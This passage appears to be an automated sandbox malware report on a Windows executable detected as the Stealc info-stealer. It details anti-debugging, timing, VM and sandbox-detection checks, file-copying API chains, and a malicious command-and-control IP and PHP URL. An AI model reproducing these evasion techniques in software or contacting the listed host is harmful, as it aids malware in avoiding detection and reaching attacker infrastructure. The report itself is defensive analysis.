Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: ACB080 second address: ACB099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FA3D4D82114h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AD8A20 second address: AD8A25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AD8A25 second address: AD8A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AD8A2D second address: AD8A33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AD8577 second address: AD857C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AD857C second address: AD85DC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 jmp 00007FA3D4C68E5Fh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push edi 0x00000012 pop edi 0x00000013 jmp 00007FA3D4C68E65h 0x00000018 popad 0x00000019 push eax 0x0000001a pushad 0x0000001b popad 0x0000001c pop eax 0x0000001d pushad 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 jmp 00007FA3D4C68E5Ah 0x00000025 jno 00007FA3D4C68E56h 0x0000002b pushad 0x0000002c popad 0x0000002d popad 0x0000002e pushad 0x0000002f pushad 0x00000030 popad 0x00000031 jmp 00007FA3D4C68E5Eh 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: ADCA34 second address: ADCA45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007FA3D4D8210Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: ADCA45 second address: ADCA62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA3D4C68E68h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AE146C second address: AE1472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AEB47B second address: AEB4B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4C68E5Fh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jnc 00007FA3D4C68E56h 0x00000012 jmp 00007FA3D4C68E68h 0x00000017 push edx 0x00000018 pop edx 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AEF408 second address: AEF412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AF446D second address: AF4471 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AF4471 second address: AF4481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA3D4D8210Ah 0x0000000b rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AF4481 second address: AF44B5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA3D4C68E5Eh 0x00000008 jmp 00007FA3D4C68E5Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007FA3D4C68E5Bh 0x00000016 push eax 0x00000017 pop eax 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AF4737 second address: AF474C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FA3D4D8210Eh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AF474C second address: AF4770 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA3D4C68E6Ah 0x00000008 jne 00007FA3D4C68E56h 0x0000000e jmp 00007FA3D4C68E5Eh 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AF4770 second address: AF4784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FA3D4D82106h 0x0000000a js 00007FA3D4D82106h 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AF4784 second address: AF478A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AF4918 second address: AF491D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AF491D second address: AF4923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AF94B5 second address: AF94BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AF922E second address: AF9232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: AF9232 second address: AF923A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: B0BB9A second address: B0BB9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: B18EC1 second address: B18ECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FA3D4D82106h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: B1AA69 second address: B1AA6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: B1AA6D second address: B1AA73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: B1DEB5 second address: B1DEBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: B1DCED second address: B1DCF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: B1DCF1 second address: B1DCFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: B1DCFF second address: B1DD1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FA3D4D82110h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c jc 00007FA3D4D82106h 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: B2BB66 second address: B2BB7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA3D4C68E56h 0x0000000a popad 0x0000000b jmp 00007FA3D4C68E5Bh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: B2BE1D second address: B2BE21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: B2C1CF second address: B2C1D9 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA3D4C68E56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: B2C1D9 second address: B2C1F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FA3D4D82108h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA3D4D8210Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: B2C1F6 second address: B2C1FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: B3077C second address: B30782 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: B30824 second address: B3082A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: B30A16 second address: B30A4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 or dh, FFFFFF8Fh 0x0000000b push 00000004h 0x0000000d mov dh, F1h 0x0000000f jl 00007FA3D4D8210Ch 0x00000015 push BE6C793Fh 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d jmp 00007FA3D4D8210Ch 0x00000022 jc 00007FA3D4D82106h 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: B30A4C second address: B30A52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: B30CBC second address: B30CCA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: 519021E second address: 5190247 instructions: 0x00000000 rdtsc 0x00000002 call 00007FA3D4C68E5Ah 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a call 00007FA3D4C68E5Bh 0x0000000f mov ch, 77h 0x00000011 pop edi 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov ax, di 0x0000001a movsx ebx, cx 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: 5190247 second address: 519027C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4D8210Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FA3D4D82119h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push ebx 0x00000014 pop esi 0x00000015 mov edi, 5F0F215Ah 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: 51902EC second address: 5190322 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4C68E5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FA3D4C68E66h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FA3D4C68E5Ah 0x0000001a rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: 5190322 second address: 5190331 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA3D4D8210Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: 5190331 second address: 5190345 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 mov bx, 0806h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push esi 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe RDTSC instruction interceptor: First address: 5190345 second address: 519034A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Special instruction interceptor: First address: 8A199E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Special instruction interceptor: First address: 8A1998 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Special instruction interceptor: First address: AD06B7 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_006538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_006538B0
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00654910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00654910
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_0064DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0064DA80
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_0064E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0064E430
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00654570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_00654570
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_0064ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_0064ED20
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_0064BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0064BE70
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_0064DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0064DE10
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_006416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_006416D0
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00653EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00653EA0
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_0064F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0064F6B0
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00641160 GetSystemInfo,ExitProcess, 0_2_00641160
Source: XDPT5mgIBO.exe, XDPT5mgIBO.exe, 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.00000000013BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware=
Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001434000.00000004.00000020.00020000.00000000.sdmp, XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001406000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.00000000013BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: XDPT5mgIBO.exe, 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe File opened: NTICE
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe File opened: SICE
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Process queried: DebugPort Jump to behavior
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_006445C0 VirtualProtect ?,00000004,00000100,00000000 0_2_006445C0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00659860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00659860
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00659750 mov eax, dword ptr fs:[00000030h] 0_2_00659750
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00657850 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_00657850
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: XDPT5mgIBO.exe PID: 5928, type: MEMORYSTR
Searches for specific processes (likely to inject)
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00659600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00659600
Source: XDPT5mgIBO.exe, XDPT5mgIBO.exe, 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: (Program Manager
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00657B90
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00656920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess, 0_2_00656920
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00657850 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_00657850
Source: C:\Users\user\Desktop\XDPT5mgIBO.exe Code function: 0_2_00657A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, 0_2_00657A30

Stealing of Sensitive Information
barindex
Yara detected Stealc
Source: Yara match File source: 0.2.XDPT5mgIBO.exe.640000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2188755013.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2147803370.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: XDPT5mgIBO.exe PID: 5928, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP

Remote Access Functionality
barindex
Yara detected Stealc
Source: Yara match File source: 0.2.XDPT5mgIBO.exe.640000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2188755013.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2147803370.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: XDPT5mgIBO.exe PID: 5928, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1527619 Sample: XDPT5mgIBO.exe Startdate: 07/10/2024 Architecture: WINDOWS Score: 100 11 Multi AV Scanner detection for domain / URL 2->11 13 Suricata IDS alerts for network traffic 2->13 15 Found malware configuration 2->15 17 9 other signatures 2->17 5 XDPT5mgIBO.exe 13 2->5         started        process3 dnsIp4 9 185.215.113.37, 49711, 80 WHOLESALECONNECTIONSNL Portugal 5->9 19 Detected unpacking (changes PE section rights) 5->19 21 Tries to detect sandboxes and other dynamic analysis tools (window names) 5->21 23 Tries to evade debugger and weak emulator (self modifying code) 5->23 25 6 other signatures 5->25 signatures5
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.37
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.37/ true
  • URL Reputation: malware
 unknown
http://185.215.113.37/e2b1563c6670f193.php true
  • URL Reputation: malware
  • URL Reputation: malware
 unknown